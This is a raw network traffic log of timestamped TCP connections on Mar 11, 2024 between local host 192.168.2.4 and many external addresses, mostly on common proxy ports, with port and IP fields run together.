                                              Mar 11, 2024 08:37:18.021147966 CET5065680192.168.2.4119.196.168.183
                                              Mar 11, 2024 08:37:18.021233082 CET505728080192.168.2.4103.118.47.243
                                              Mar 11, 2024 08:37:18.021342039 CET8050454104.18.103.125192.168.2.4
                                              Mar 11, 2024 08:37:18.021450043 CET108049905113.160.164.181192.168.2.4
                                              Mar 11, 2024 08:37:18.022411108 CET500388080192.168.2.4125.27.253.117
                                              Mar 11, 2024 08:37:18.022425890 CET5004880192.168.2.4213.202.230.241
                                              Mar 11, 2024 08:37:18.022430897 CET5004680192.168.2.4185.82.176.34
                                              Mar 11, 2024 08:37:18.022432089 CET500553128192.168.2.4201.243.82.157
                                              Mar 11, 2024 08:37:18.022444963 CET500566969192.168.2.4200.116.199.179
                                              Mar 11, 2024 08:37:18.022474051 CET500595678192.168.2.4186.248.87.172
                                              Mar 11, 2024 08:37:18.022476912 CET5006022566192.168.2.4208.87.131.240
                                              Mar 11, 2024 08:37:18.022476912 CET5022780192.168.2.450.174.145.11
                                              Mar 11, 2024 08:37:18.022855997 CET501573128192.168.2.435.79.120.242
                                              Mar 11, 2024 08:37:18.022921085 CET4991384192.168.2.4103.105.126.18
                                              Mar 11, 2024 08:37:18.022932053 CET499698080192.168.2.4110.74.221.48
                                              Mar 11, 2024 08:37:18.022932053 CET5003780192.168.2.434.154.161.152
                                              Mar 11, 2024 08:37:18.022936106 CET500328080192.168.2.4138.0.228.122
                                              Mar 11, 2024 08:37:18.022936106 CET5004339713192.168.2.454.36.122.16
                                              Mar 11, 2024 08:37:18.022936106 CET50047999192.168.2.4200.95.184.58
                                              Mar 11, 2024 08:37:18.022953033 CET5004934099192.168.2.4162.241.50.179
                                              Mar 11, 2024 08:37:18.022953033 CET500513128192.168.2.494.131.106.196
                                              Mar 11, 2024 08:37:18.022953033 CET5005012196192.168.2.431.200.242.201
                                              Mar 11, 2024 08:37:18.022970915 CET5027554610192.168.2.4192.95.29.34
                                              Mar 11, 2024 08:37:18.023026943 CET500589000192.168.2.4198.20.116.86
                                              Mar 11, 2024 08:37:18.023034096 CET500548080192.168.2.454.37.196.189
                                              Mar 11, 2024 08:37:18.023332119 CET5095480192.168.2.4191.101.1.116
                                              Mar 11, 2024 08:37:18.023813963 CET4982837920192.168.2.437.187.77.58
                                              Mar 11, 2024 08:37:18.024976969 CET5328150775198.12.255.193192.168.2.4
                                              Mar 11, 2024 08:37:18.025115967 CET5077553281192.168.2.4198.12.255.193
                                              Mar 11, 2024 08:37:18.025310993 CET5077553281192.168.2.4198.12.255.193
                                              Mar 11, 2024 08:37:18.025310993 CET4988780192.168.2.4147.75.92.251
                                              Mar 11, 2024 08:37:18.026007891 CET509564145192.168.2.4142.54.228.193
                                              Mar 11, 2024 08:37:18.026052952 CET808050505143.44.191.108192.168.2.4
                                              Mar 11, 2024 08:37:18.026061058 CET509558088192.168.2.447.106.76.196
                                              Mar 11, 2024 08:37:18.026473045 CET509585088192.168.2.488.99.138.21
                                              Mar 11, 2024 08:37:18.026475906 CET5095753281192.168.2.4181.129.183.19
                                              Mar 11, 2024 08:37:18.026927948 CET509595678192.168.2.489.191.237.89
                                              Mar 11, 2024 08:37:18.026938915 CET5096083192.168.2.4103.48.69.105
                                              Mar 11, 2024 08:37:18.027096987 CET5096122500192.168.2.451.79.87.144
                                              Mar 11, 2024 08:37:18.027472019 CET31295051620.219.177.38192.168.2.4
                                              Mar 11, 2024 08:37:18.027508020 CET805074750.172.218.160192.168.2.4
                                              Mar 11, 2024 08:37:18.027510881 CET5096280192.168.2.4203.189.96.232
                                              Mar 11, 2024 08:37:18.027743101 CET509634153192.168.2.493.90.212.2
                                              Mar 11, 2024 08:37:18.028553963 CET509646014192.168.2.445.11.95.166
                                              Mar 11, 2024 08:37:18.028719902 CET800050836146.190.35.152192.168.2.4
                                              Mar 11, 2024 08:37:18.029068947 CET81925062731.211.130.237192.168.2.4
                                              Mar 11, 2024 08:37:18.029158115 CET506278192192.168.2.431.211.130.237
                                              Mar 11, 2024 08:37:18.029572964 CET506278192192.168.2.431.211.130.237
                                              Mar 11, 2024 08:37:18.029572964 CET509651111192.168.2.4103.189.249.196
                                              Mar 11, 2024 08:37:18.029906988 CET5096680192.168.2.4107.148.201.157
                                              Mar 11, 2024 08:37:18.030292988 CET5096735081192.168.2.4194.163.159.93
                                              Mar 11, 2024 08:37:18.031315088 CET312850620193.56.255.181192.168.2.4
                                              Mar 11, 2024 08:37:18.032383919 CET31285048038.162.14.200192.168.2.4
                                              Mar 11, 2024 08:37:18.033751011 CET41455069568.1.210.163192.168.2.4
                                              Mar 11, 2024 08:37:18.034499884 CET506954145192.168.2.468.1.210.163
                                              Mar 11, 2024 08:37:18.035521030 CET808050729159.203.61.169192.168.2.4
                                              Mar 11, 2024 08:37:18.035650015 CET507298080192.168.2.4159.203.61.169
                                              Mar 11, 2024 08:37:18.035835028 CET80805059191.202.230.219192.168.2.4
                                              Mar 11, 2024 08:37:18.035914898 CET505918080192.168.2.491.202.230.219
                                              Mar 11, 2024 08:37:18.037348032 CET483350508148.72.23.56192.168.2.4
                                              Mar 11, 2024 08:37:18.038047075 CET5006413135192.168.2.4108.175.24.1
                                              Mar 11, 2024 08:37:18.038048983 CET500538080192.168.2.436.91.148.36
                                              Mar 11, 2024 08:37:18.038062096 CET500698080192.168.2.4217.172.122.14
                                              Mar 11, 2024 08:37:18.038064003 CET5005759867192.168.2.4206.189.145.23
                                              Mar 11, 2024 08:37:18.038074970 CET500668899192.168.2.412.7.109.1
                                              Mar 11, 2024 08:37:18.038091898 CET502862871192.168.2.467.43.236.20
                                              Mar 11, 2024 08:37:18.038091898 CET5005280192.168.2.461.230.151.39
                                              Mar 11, 2024 08:37:18.038094044 CET500703128192.168.2.4156.54.240.53
                                              Mar 11, 2024 08:37:18.038094044 CET50061999192.168.2.490.74.184.32
                                              Mar 11, 2024 08:37:18.038094044 CET500745005192.168.2.41.194.236.229
                                              Mar 11, 2024 08:37:18.038094997 CET500751080192.168.2.4103.179.124.10
                                              Mar 11, 2024 08:37:18.039990902 CET8050676121.159.146.251192.168.2.4
                                              Mar 11, 2024 08:37:18.040138960 CET5067680192.168.2.4121.159.146.251
                                              Mar 11, 2024 08:37:18.042140007 CET55555503228.222.152.158192.168.2.4
                                              Mar 11, 2024 08:37:18.042244911 CET55555503228.222.152.158192.168.2.4
                                              Mar 11, 2024 08:37:18.044404984 CET31285000146.51.249.135192.168.2.4
                                              Mar 11, 2024 08:37:18.044557095 CET248155066995.217.104.21192.168.2.4
                                              Mar 11, 2024 08:37:18.047791958 CET414550632185.169.181.27192.168.2.4
                                              Mar 11, 2024 08:37:18.049187899 CET509684145192.168.2.4199.58.184.97
                                              Mar 11, 2024 08:37:18.049187899 CET506954145192.168.2.468.1.210.163
                                              Mar 11, 2024 08:37:18.049212933 CET805013191.107.180.25192.168.2.4
                                              Mar 11, 2024 08:37:18.049501896 CET5096930422192.168.2.4157.245.131.28
                                              Mar 11, 2024 08:37:18.049742937 CET31284986918.185.169.150192.168.2.4
                                              Mar 11, 2024 08:37:18.049750090 CET5032255555192.168.2.48.222.152.158
                                              Mar 11, 2024 08:37:18.050009012 CET5067680192.168.2.4121.159.146.251
                                              Mar 11, 2024 08:37:18.051440001 CET8050678104.20.233.70192.168.2.4
                                              Mar 11, 2024 08:37:18.051489115 CET8050678104.20.233.70192.168.2.4
                                              Mar 11, 2024 08:37:18.051760912 CET8050678104.20.233.70192.168.2.4
                                              Mar 11, 2024 08:37:18.051986933 CET5067880192.168.2.4104.20.233.70
                                              Mar 11, 2024 08:37:18.052172899 CET507298080192.168.2.4159.203.61.169
                                              Mar 11, 2024 08:37:18.052572966 CET5067880192.168.2.4104.20.233.70
                                              Mar 11, 2024 08:37:18.053149939 CET505918080192.168.2.491.202.230.219
                                              Mar 11, 2024 08:37:18.053313017 CET99950732191.97.16.160192.168.2.4
                                              Mar 11, 2024 08:37:18.053647995 CET805006750.168.163.183192.168.2.4
                                              Mar 11, 2024 08:37:18.053668976 CET5013737770192.168.2.423.105.170.32
                                              Mar 11, 2024 08:37:18.053674936 CET500292792192.168.2.4148.72.212.183
                                              Mar 11, 2024 08:37:18.053694010 CET500738080192.168.2.4122.52.196.36
                                              Mar 11, 2024 08:37:18.053694010 CET4977980192.168.2.450.168.72.112
                                              Mar 11, 2024 08:37:18.053694010 CET50082999192.168.2.445.189.118.92
                                              Mar 11, 2024 08:37:18.053710938 CET5006380192.168.2.4103.242.119.88
                                              Mar 11, 2024 08:37:18.053710938 CET4978051080192.168.2.4159.65.253.201
                                              Mar 11, 2024 08:37:18.054327011 CET509708888192.168.2.489.46.249.148
                                              Mar 11, 2024 08:37:18.054395914 CET5097149093192.168.2.4128.199.165.63
                                              Mar 11, 2024 08:37:18.054843903 CET5097244387192.168.2.4148.72.215.230
                                              Mar 11, 2024 08:37:18.054941893 CET509733128192.168.2.438.162.20.74
                                              Mar 11, 2024 08:37:18.055591106 CET509769050192.168.2.485.143.213.2
                                              Mar 11, 2024 08:37:18.055704117 CET5097783192.168.2.4103.183.63.14
                                              Mar 11, 2024 08:37:18.055721998 CET5833050834162.241.46.54192.168.2.4
                                              Mar 11, 2024 08:37:18.055810928 CET5083458330192.168.2.4162.241.46.54
                                              Mar 11, 2024 08:37:18.056025028 CET5083458330192.168.2.4162.241.46.54
                                              Mar 11, 2024 08:37:18.056068897 CET509781080192.168.2.4103.47.93.210
                                              Mar 11, 2024 08:37:18.056211948 CET5097520183192.168.2.4201.76.122.177
                                              Mar 11, 2024 08:37:18.056525946 CET5097949547192.168.2.4174.77.111.198
                                              Mar 11, 2024 08:37:18.057687998 CET509744145192.168.2.4200.80.227.234
                                              Mar 11, 2024 08:37:18.057777882 CET805001450.174.145.9192.168.2.4
                                              Mar 11, 2024 08:37:18.058342934 CET5098180192.168.2.450.173.140.148
                                              Mar 11, 2024 08:37:18.058372021 CET5098021108192.168.2.467.205.177.122
                                              Mar 11, 2024 08:37:18.058723927 CET509823128192.168.2.4176.58.96.11
                                              Mar 11, 2024 08:37:18.058726072 CET509839764192.168.2.4162.243.102.207
                                              Mar 11, 2024 08:37:18.058936119 CET509841080192.168.2.4171.250.218.113
                                              Mar 11, 2024 08:37:18.059717894 CET5098580192.168.2.4185.162.228.128
                                              Mar 11, 2024 08:37:18.059765100 CET509868080192.168.2.4190.187.201.26
                                              Mar 11, 2024 08:37:18.060363054 CET41455086972.195.34.41192.168.2.4
                                              Mar 11, 2024 08:37:18.060587883 CET508694145192.168.2.472.195.34.41
                                              Mar 11, 2024 08:37:18.060969114 CET5098722785192.168.2.4198.12.255.193
                                              Mar 11, 2024 08:37:18.061110020 CET10805051023.19.244.109192.168.2.4
                                              Mar 11, 2024 08:37:18.061196089 CET10805051023.19.244.109192.168.2.4
                                              Mar 11, 2024 08:37:18.061311007 CET505101080192.168.2.423.19.244.109
                                              Mar 11, 2024 08:37:18.061393976 CET505101080192.168.2.423.19.244.109
                                              Mar 11, 2024 08:37:18.062021017 CET509881080192.168.2.423.19.244.109
                                              Mar 11, 2024 08:37:18.062066078 CET41454988672.195.34.42192.168.2.4
                                              Mar 11, 2024 08:37:18.062463999 CET498864145192.168.2.472.195.34.42
                                              Mar 11, 2024 08:37:18.063070059 CET498864145192.168.2.472.195.34.42
                                              Mar 11, 2024 08:37:18.063071012 CET509899123192.168.2.4173.249.29.243
                                              Mar 11, 2024 08:37:18.063530922 CET50990999192.168.2.4186.125.218.153
                                              Mar 11, 2024 08:37:18.063713074 CET5099180192.168.2.482.210.56.251
                                              Mar 11, 2024 08:37:18.065779924 CET509924153192.168.2.480.122.170.182
                                              Mar 11, 2024 08:37:18.067049980 CET509934999192.168.2.4222.174.178.122
                                              Mar 11, 2024 08:37:18.067951918 CET509944837192.168.2.4124.167.249.234
                                              Mar 11, 2024 08:37:18.069305897 CET4999712581192.168.2.472.167.222.113
                                              Mar 11, 2024 08:37:18.069307089 CET500774153192.168.2.4103.79.96.174
                                              Mar 11, 2024 08:37:18.069320917 CET5007940975192.168.2.4146.59.18.246
                                              Mar 11, 2024 08:37:18.069329977 CET500848080192.168.2.4102.16.24.30
                                              Mar 11, 2024 08:37:18.069330931 CET5007859040192.168.2.434.79.91.3
                                              Mar 11, 2024 08:37:18.069330931 CET501924153192.168.2.4203.217.169.207
                                              Mar 11, 2024 08:37:18.069331884 CET500813128192.168.2.445.8.21.43
                                              Mar 11, 2024 08:37:18.069331884 CET5008863404192.168.2.4192.99.207.129
                                              Mar 11, 2024 08:37:18.069339037 CET5008523711192.168.2.445.81.232.17
                                              Mar 11, 2024 08:37:18.069339991 CET502182080192.168.2.4220.189.52.36
                                              Mar 11, 2024 08:37:18.069355965 CET5008643076192.168.2.4194.163.129.90
                                              Mar 11, 2024 08:37:18.069359064 CET500874048192.168.2.4188.214.129.3
                                              Mar 11, 2024 08:37:18.069360018 CET500893128192.168.2.4195.158.8.150
                                              Mar 11, 2024 08:37:18.069377899 CET500923128192.168.2.447.91.65.23
                                              Mar 11, 2024 08:37:18.069380999 CET500918080192.168.2.4188.132.222.23
                                              Mar 11, 2024 08:37:18.069381952 CET5026680192.168.2.450.174.216.104
                                              Mar 11, 2024 08:37:18.069444895 CET5009634761192.168.2.4148.72.206.84
                                              Mar 11, 2024 08:37:18.069448948 CET50090999192.168.2.4143.202.97.171
                                              Mar 11, 2024 08:37:18.069448948 CET500951080192.168.2.4103.47.93.227
                                              Mar 11, 2024 08:37:18.070008039 CET800050589157.230.33.25192.168.2.4
                                              Mar 11, 2024 08:37:18.071629047 CET889950382117.160.250.132192.168.2.4
                                              Mar 11, 2024 08:37:18.071749926 CET503828899192.168.2.4117.160.250.132
                                              Mar 11, 2024 08:37:18.071832895 CET503828899192.168.2.4117.160.250.132
                                              Mar 11, 2024 08:37:18.072263956 CET251375080792.204.136.149192.168.2.4
                                              Mar 11, 2024 08:37:18.072977066 CET805079950.168.163.177192.168.2.4
                                              Mar 11, 2024 08:37:18.073092937 CET5080725137192.168.2.492.204.136.149
                                              Mar 11, 2024 08:37:18.073139906 CET5080725137192.168.2.492.204.136.149
                                              Mar 11, 2024 08:37:18.074067116 CET414550464174.75.211.222192.168.2.4
                                              Mar 11, 2024 08:37:18.074345112 CET414550464174.75.211.222192.168.2.4
                                              Mar 11, 2024 08:37:18.075285912 CET808949963114.231.45.178192.168.2.4
                                              Mar 11, 2024 08:37:18.076262951 CET509954145192.168.2.4174.75.211.222
                                              Mar 11, 2024 08:37:18.078526974 CET414550643103.116.118.10192.168.2.4
                                              Mar 11, 2024 08:37:18.079618931 CET805074350.173.140.150192.168.2.4
                                              Mar 11, 2024 08:37:18.080009937 CET805076350.171.68.130192.168.2.4
                                              Mar 11, 2024 08:37:18.083060026 CET31285058662.171.133.66192.168.2.4
                                              Mar 11, 2024 08:37:18.083127022 CET263235083167.43.228.253192.168.2.4
                                              Mar 11, 2024 08:37:18.083200932 CET5506649991173.212.227.160192.168.2.4
                                              Mar 11, 2024 08:37:18.083359957 CET1132050885132.148.16.169192.168.2.4
                                              Mar 11, 2024 08:37:18.083559990 CET5088511320192.168.2.4132.148.16.169
                                              Mar 11, 2024 08:37:18.083575964 CET505863128192.168.2.462.171.133.66
                                              Mar 11, 2024 08:37:18.083889961 CET226695082767.43.228.251192.168.2.4
                                              Mar 11, 2024 08:37:18.083924055 CET505863128192.168.2.462.171.133.66
                                              Mar 11, 2024 08:37:18.084058046 CET804975381.91.139.76192.168.2.4
                                              Mar 11, 2024 08:37:18.084112883 CET804975381.91.139.76192.168.2.4
                                              Mar 11, 2024 08:37:18.084388971 CET804975381.91.139.76192.168.2.4
                                              Mar 11, 2024 08:37:18.084398031 CET804975381.91.139.76192.168.2.4
                                              Mar 11, 2024 08:37:18.084705114 CET4975380192.168.2.481.91.139.76
                                              Mar 11, 2024 08:37:18.084945917 CET5009927138192.168.2.4173.212.209.216
                                              Mar 11, 2024 08:37:18.084945917 CET501018896192.168.2.4192.163.201.131
                                              Mar 11, 2024 08:37:18.084961891 CET50109999192.168.2.4177.93.45.154
                                              Mar 11, 2024 08:37:18.084961891 CET501035678192.168.2.494.198.211.217
                                              Mar 11, 2024 08:37:18.084964037 CET50108999192.168.2.438.51.49.84
                                              Mar 11, 2024 08:37:18.084964037 CET501061080192.168.2.4103.47.93.217
                                              Mar 11, 2024 08:37:18.084964991 CET500013128192.168.2.446.51.249.135
                                              Mar 11, 2024 08:37:18.084969044 CET5010080192.168.2.4181.120.28.228
                                              Mar 11, 2024 08:37:18.084981918 CET502723128192.168.2.4134.209.29.120
                                              Mar 11, 2024 08:37:18.084992886 CET4975380192.168.2.481.91.139.76
                                              Mar 11, 2024 08:37:18.084997892 CET501028090192.168.2.4115.127.112.74
                                              Mar 11, 2024 08:37:18.086960077 CET10815034694.131.14.66192.168.2.4
                                              Mar 11, 2024 08:37:18.087080956 CET503461081192.168.2.494.131.14.66
                                              Mar 11, 2024 08:37:18.087080956 CET503461081192.168.2.494.131.14.66
                                              Mar 11, 2024 08:37:18.087291002 CET8050693185.162.228.170192.168.2.4
                                              Mar 11, 2024 08:37:18.087291002 CET509961081192.168.2.494.131.14.66
                                              Mar 11, 2024 08:37:18.087359905 CET8050693185.162.228.170192.168.2.4
                                              Mar 11, 2024 08:37:18.087668896 CET5069380192.168.2.4185.162.228.170
                                              Mar 11, 2024 08:37:18.087745905 CET31285063737.156.146.163192.168.2.4
                                              Mar 11, 2024 08:37:18.087893009 CET506373128192.168.2.437.156.146.163
                                              Mar 11, 2024 08:37:18.087968111 CET506373128192.168.2.437.156.146.163
                                              Mar 11, 2024 08:37:18.088063955 CET8050693185.162.228.170192.168.2.4
                                              Mar 11, 2024 08:37:18.088134050 CET5069380192.168.2.4185.162.228.170
                                              Mar 11, 2024 08:37:18.088196039 CET8050509185.238.228.67192.168.2.4
                                              Mar 11, 2024 08:37:18.088421106 CET8050511172.67.162.127192.168.2.4
                                              Mar 11, 2024 08:37:18.088668108 CET5088511320192.168.2.4132.148.16.169
                                              Mar 11, 2024 08:37:18.089015961 CET805076050.218.57.70192.168.2.4
                                              Mar 11, 2024 08:37:18.089368105 CET1000050711147.75.34.86192.168.2.4
                                              Mar 11, 2024 08:37:18.089479923 CET5071110000192.168.2.4147.75.34.86
                                              Mar 11, 2024 08:37:18.089709997 CET3128499123.122.84.99192.168.2.4
                                              Mar 11, 2024 08:37:18.089742899 CET5071110000192.168.2.4147.75.34.86
                                              Mar 11, 2024 08:37:18.090868950 CET5099744437192.168.2.4207.180.234.220
                                              Mar 11, 2024 08:37:18.090871096 CET509988080192.168.2.445.125.222.81
                                              Mar 11, 2024 08:37:18.091157913 CET99495014872.10.164.178192.168.2.4
                                              Mar 11, 2024 08:37:18.091226101 CET805043812.186.205.121192.168.2.4
                                              Mar 11, 2024 08:37:18.096296072 CET8050712104.22.1.113192.168.2.4
                                              Mar 11, 2024 08:37:18.096304893 CET8050712104.22.1.113192.168.2.4
                                              Mar 11, 2024 08:37:18.096971989 CET8050713104.24.15.158192.168.2.4
                                              Mar 11, 2024 08:37:18.097071886 CET8050713104.24.15.158192.168.2.4
                                              Mar 11, 2024 08:37:18.097079992 CET8050712104.22.1.113192.168.2.4
                                              Mar 11, 2024 08:37:18.097095966 CET5071280192.168.2.4104.22.1.113
                                              Mar 11, 2024 08:37:18.097162008 CET5071280192.168.2.4104.22.1.113
                                              Mar 11, 2024 08:37:18.097310066 CET5071380192.168.2.4104.24.15.158
                                              Mar 11, 2024 08:37:18.097942114 CET8050713104.24.15.158192.168.2.4
                                              Mar 11, 2024 08:37:18.098036051 CET5071380192.168.2.4104.24.15.158
                                              Mar 11, 2024 08:37:18.098048925 CET498693128192.168.2.418.185.169.150
                                              Mar 11, 2024 08:37:18.098073959 CET5010512334192.168.2.4146.19.106.193
                                              Mar 11, 2024 08:37:18.098107100 CET501469999192.168.2.4171.35.172.147
                                              Mar 11, 2024 08:37:18.099291086 CET509994153192.168.2.4177.38.5.51
                                              Mar 11, 2024 08:37:18.099904060 CET999049806117.160.250.163192.168.2.4
                                              Mar 11, 2024 08:37:18.100014925 CET498069990192.168.2.4117.160.250.163
                                              Mar 11, 2024 08:37:18.100399017 CET498069990192.168.2.4117.160.250.163
                                              Mar 11, 2024 08:37:18.100533962 CET501173128192.168.2.431.214.171.62
                                              Mar 11, 2024 08:37:18.100542068 CET501075678192.168.2.4196.44.181.37
                                              Mar 11, 2024 08:37:18.100542068 CET501104153192.168.2.4185.32.4.110
                                              Mar 11, 2024 08:37:18.100542068 CET501138187192.168.2.4176.8.230.197
                                              Mar 11, 2024 08:37:18.100542068 CET501238080192.168.2.48.218.100.120
                                              Mar 11, 2024 08:37:18.100553989 CET501241975192.168.2.441.33.203.234
                                              Mar 11, 2024 08:37:18.100589991 CET50125998192.168.2.4181.78.85.45
                                              Mar 11, 2024 08:37:18.100589991 CET501271080192.168.2.4103.47.93.231
                                              Mar 11, 2024 08:37:18.100639105 CET501198080192.168.2.4129.18.164.130
                                              Mar 11, 2024 08:37:18.100639105 CET5011480192.168.2.4217.182.210.152
                                              Mar 11, 2024 08:37:18.100649118 CET501288081192.168.2.4180.191.254.10
                                              Mar 11, 2024 08:37:18.100657940 CET501211111192.168.2.4103.156.249.82
                                              Mar 11, 2024 08:37:18.100712061 CET808050532102.132.50.6192.168.2.4
                                              Mar 11, 2024 08:37:18.101052999 CET505328080192.168.2.4102.132.50.6
                                              Mar 11, 2024 08:37:18.101171017 CET805086250.239.72.19192.168.2.4
                                              Mar 11, 2024 08:37:18.101294994 CET505328080192.168.2.4102.132.50.6
                                              Mar 11, 2024 08:37:18.104006052 CET5100080192.168.2.416.170.1.8
                                              Mar 11, 2024 08:37:18.104083061 CET510018197192.168.2.4175.183.82.221
                                              Mar 11, 2024 08:37:18.105413914 CET8050526172.67.182.126192.168.2.4
                                              Mar 11, 2024 08:37:18.105663061 CET5100280192.168.2.434.126.187.77
                                              Mar 11, 2024 08:37:18.106363058 CET10815034694.131.14.66192.168.2.4
                                              Mar 11, 2024 08:37:18.107019901 CET56785033180.92.227.185192.168.2.4
                                              Mar 11, 2024 08:37:18.107106924 CET5100343100192.168.2.4192.163.201.131
                                              Mar 11, 2024 08:37:18.107140064 CET503315678192.168.2.480.92.227.185
                                              Mar 11, 2024 08:37:18.107477903 CET503315678192.168.2.480.92.227.185
                                              Mar 11, 2024 08:37:18.108158112 CET312849935122.155.165.191192.168.2.4
                                              Mar 11, 2024 08:37:18.108203888 CET510045678192.168.2.480.92.227.185
                                              Mar 11, 2024 08:37:18.108505011 CET8050561195.23.57.78192.168.2.4
                                              Mar 11, 2024 08:37:18.112238884 CET415349856203.170.75.14192.168.2.4
                                              Mar 11, 2024 08:37:18.112262011 CET510053128192.168.2.438.162.29.213
                                              Mar 11, 2024 08:37:18.113727093 CET804975550.207.199.80192.168.2.4
                                              Mar 11, 2024 08:37:18.114166021 CET805069477.91.74.77192.168.2.4
                                              Mar 11, 2024 08:37:18.114171982 CET510064153192.168.2.445.231.29.75
                                              Mar 11, 2024 08:37:18.114507914 CET5069480192.168.2.477.91.74.77
                                              Mar 11, 2024 08:37:18.114562988 CET5069480192.168.2.477.91.74.77
                                              Mar 11, 2024 08:37:18.114605904 CET31285059638.162.24.12192.168.2.4
                                              Mar 11, 2024 08:37:18.115118027 CET8050679103.49.202.252192.168.2.4
                                              Mar 11, 2024 08:37:18.115464926 CET5067980192.168.2.4103.49.202.252
                                              Mar 11, 2024 08:37:18.115549088 CET5067980192.168.2.4103.49.202.252
                                              Mar 11, 2024 08:37:18.116166115 CET501208104192.168.2.4196.251.221.2
                                              Mar 11, 2024 08:37:18.116169930 CET5029880192.168.2.450.169.118.209
                                              Mar 11, 2024 08:37:18.116172075 CET4973680192.168.2.450.174.145.10
                                              Mar 11, 2024 08:37:18.116194010 CET501263128192.168.2.4156.239.50.58
                                              Mar 11, 2024 08:37:18.116202116 CET501308080192.168.2.4103.167.68.77
                                              Mar 11, 2024 08:37:18.116202116 CET501345678192.168.2.4103.130.113.129
                                              Mar 11, 2024 08:37:18.118410110 CET6355050031185.92.244.37192.168.2.4
                                              Mar 11, 2024 08:37:18.118618965 CET577285084170.166.167.38192.168.2.4
                                              Mar 11, 2024 08:37:18.118777990 CET5100780192.168.2.4134.209.189.42
                                              Mar 11, 2024 08:37:18.118778944 CET5084157728192.168.2.470.166.167.38
                                              Mar 11, 2024 08:37:18.118921041 CET196005079392.205.110.47192.168.2.4
                                              Mar 11, 2024 08:37:18.119002104 CET5079319600192.168.2.492.205.110.47
                                              Mar 11, 2024 08:37:18.119214058 CET5079319600192.168.2.492.205.110.47
                                              Mar 11, 2024 08:37:18.119235039 CET5084157728192.168.2.470.166.167.38
                                              Mar 11, 2024 08:37:18.120961905 CET56785033180.92.227.185192.168.2.4
                                              Mar 11, 2024 08:37:18.121718884 CET414550652142.54.235.9192.168.2.4
                                              Mar 11, 2024 08:37:18.122030973 CET414550652142.54.235.9192.168.2.4
                                              Mar 11, 2024 08:37:18.122251034 CET5100810801192.168.2.449.0.42.114
                                              Mar 11, 2024 08:37:18.122421980 CET119235018767.43.228.253192.168.2.4
                                              Mar 11, 2024 08:37:18.122752905 CET800050704128.199.252.41192.168.2.4
                                              Mar 11, 2024 08:37:18.123003006 CET510094145192.168.2.4142.54.235.9
                                              Mar 11, 2024 08:37:18.123294115 CET804989361.110.5.2192.168.2.4
                                              Mar 11, 2024 08:37:18.124150038 CET510108080192.168.2.467.22.28.62
                                              Mar 11, 2024 08:37:18.124150991 CET4989380192.168.2.461.110.5.2
                                              Mar 11, 2024 08:37:18.124238014 CET4989380192.168.2.461.110.5.2
                                              Mar 11, 2024 08:37:18.124727011 CET414550503184.181.217.210192.168.2.4
                                              Mar 11, 2024 08:37:18.124851942 CET414550503184.181.217.210192.168.2.4
                                              Mar 11, 2024 08:37:18.125464916 CET4082550787167.172.109.12192.168.2.4
                                              Mar 11, 2024 08:37:18.126137972 CET510114145192.168.2.4184.181.217.210
                                              Mar 11, 2024 08:37:18.128530979 CET5101280192.168.2.4104.248.59.38
                                              Mar 11, 2024 08:37:18.130356073 CET88885070647.236.252.21192.168.2.4
                                              Mar 11, 2024 08:37:18.130851984 CET5101380192.168.2.4163.44.253.160
                                              Mar 11, 2024 08:37:18.130980968 CET507068888192.168.2.447.236.252.21
                                              Mar 11, 2024 08:37:18.131350040 CET805013950.168.210.238192.168.2.4
                                              Mar 11, 2024 08:37:18.131433964 CET507068888192.168.2.447.236.252.21
                                              Mar 11, 2024 08:37:18.131511927 CET510143547192.168.2.445.117.179.179
                                              Mar 11, 2024 08:37:18.131799936 CET5013338772192.168.2.4213.136.79.177
                                              Mar 11, 2024 08:37:18.131807089 CET50132999192.168.2.4190.97.238.89
                                              Mar 11, 2024 08:37:18.131808043 CET5013564871192.168.2.482.223.121.72
                                              Mar 11, 2024 08:37:18.131808043 CET5031280192.168.2.450.174.7.153
                                              Mar 11, 2024 08:37:18.131808043 CET5014780192.168.2.474.82.6.220
                                              Mar 11, 2024 08:37:18.131823063 CET499123128192.168.2.43.122.84.99
                                              Mar 11, 2024 08:37:18.131823063 CET501384145192.168.2.4184.181.217.194
                                              Mar 11, 2024 08:37:18.131823063 CET501598080192.168.2.4103.124.139.137
                                              Mar 11, 2024 08:37:18.131824017 CET5015280192.168.2.485.214.107.177
                                              Mar 11, 2024 08:37:18.131823063 CET501498080192.168.2.4187.141.184.235
                                              Mar 11, 2024 08:37:18.131823063 CET501458080192.168.2.4103.151.236.131
                                              Mar 11, 2024 08:37:18.131838083 CET5015324000192.168.2.4162.254.38.202
                                              Mar 11, 2024 08:37:18.131838083 CET5016225154192.168.2.4159.223.166.21
                                              Mar 11, 2024 08:37:18.132325888 CET8050098156.67.217.159192.168.2.4
                                              Mar 11, 2024 08:37:18.133076906 CET5101513335192.168.2.4104.18.166.99
                                              Mar 11, 2024 08:37:18.133903027 CET808950758114.231.42.139192.168.2.4
                                              Mar 11, 2024 08:37:18.135338068 CET510163128192.168.2.438.162.25.62
                                              Mar 11, 2024 08:37:18.135643959 CET31285088638.162.1.90192.168.2.4
                                              Mar 11, 2024 08:37:18.135833025 CET508863128192.168.2.438.162.1.90
                                              Mar 11, 2024 08:37:18.136049986 CET508863128192.168.2.438.162.1.90
                                              Mar 11, 2024 08:37:18.136502028 CET5101710001192.168.2.4103.164.112.123
                                              Mar 11, 2024 08:37:18.138319016 CET510188080192.168.2.4182.253.31.83
                                              Mar 11, 2024 08:37:18.138325930 CET510194145192.168.2.4168.227.158.25
                                              Mar 11, 2024 08:37:18.139336109 CET5102020133192.168.2.427.0.234.22
                                              Mar 11, 2024 08:37:18.140208006 CET346334981666.29.128.241192.168.2.4
                                              Mar 11, 2024 08:37:18.140324116 CET510218089192.168.2.4223.215.176.121
                                              Mar 11, 2024 08:37:18.140351057 CET8050735172.67.181.129192.168.2.4
                                              Mar 11, 2024 08:37:18.140424967 CET8050735172.67.181.129192.168.2.4
                                              Mar 11, 2024 08:37:18.140891075 CET5073580192.168.2.4172.67.181.129
                                              Mar 11, 2024 08:37:18.141089916 CET8050735172.67.181.129192.168.2.4
                                              Mar 11, 2024 08:37:18.141181946 CET5073580192.168.2.4172.67.181.129
                                              Mar 11, 2024 08:37:18.141714096 CET5102239452192.168.2.4167.172.109.12
                                              Mar 11, 2024 08:37:18.142271996 CET804996723.161.96.132192.168.2.4
                                              Mar 11, 2024 08:37:18.142472982 CET4996780192.168.2.423.161.96.132
                                              Mar 11, 2024 08:37:18.142545938 CET4981634633192.168.2.466.29.128.241
                                              Mar 11, 2024 08:37:18.142847061 CET4996780192.168.2.423.161.96.132
                                              Mar 11, 2024 08:37:18.143862009 CET510233128192.168.2.4104.248.146.99
